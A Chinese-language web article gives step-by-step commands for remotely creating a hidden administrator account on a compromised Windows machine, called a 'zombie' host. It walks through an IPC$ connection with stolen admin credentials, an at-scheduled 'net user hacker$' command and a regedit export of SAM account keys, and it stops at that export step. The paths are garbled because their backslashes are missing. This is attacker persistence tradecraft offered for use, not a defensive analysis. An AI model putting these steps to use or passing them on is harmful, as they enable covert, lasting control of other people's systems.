2024年10月高手汇总隐藏超级用户的那些方法

 更新时间:2024-10-29

  超级用户是一个负责管理和维护网络的用户。这个术语在NetWare网上有特殊的含义。超级用户对所有的文件卷宗、目录和文件有完全的访问权,它是安装后第一个登录到服务器上的用户。然后超级用户立即改变口令,于是没有其它用户能够访问服务器和获得超级用户无限的访问权。那么在系统中如何隐藏超级用户呢?下文中就为大家列举系统中多种隐藏超级用户方法.

  一、如何在命令行下远程建立隐藏的超级用户

  在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。

  对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。

  1、首先找到一台肉鸡,至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡,现在我们开始在命令行下远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机,我将它的ip地址改为13.50.97.238,,请勿在互联网上对号入座,以免骚扰正常的ip地址。)

  2、先与肉鸡建立连接,命令为:net use 13.50.97.238ipc$ "12345678" /user:"administrator

  3、用at命令在肉鸡上建立一个用户(如果at服务没有启动,可用小榕的netsvc.exe或sc.exe来远程启动):

  at 13.50.97.238 12:51 c:winntsystem32net.exe user hacker$ 1234 /add

  建立这个加有$符的用户名,是因为加有$符后,命令行下用net user将不显示这个用户,但在帐户管理器却能看到这个用户。

  4、同样用at命令导出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下键值:

  at 13.50.97.238 12:55 c:winntregedit.exe /e hacker.reg

  HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers

  /e 是regedit.exe的参数,在_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的一定要以结尾。必要的情况下可以用引号将“c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”引起来。

您可能感兴趣的文章:

相关文章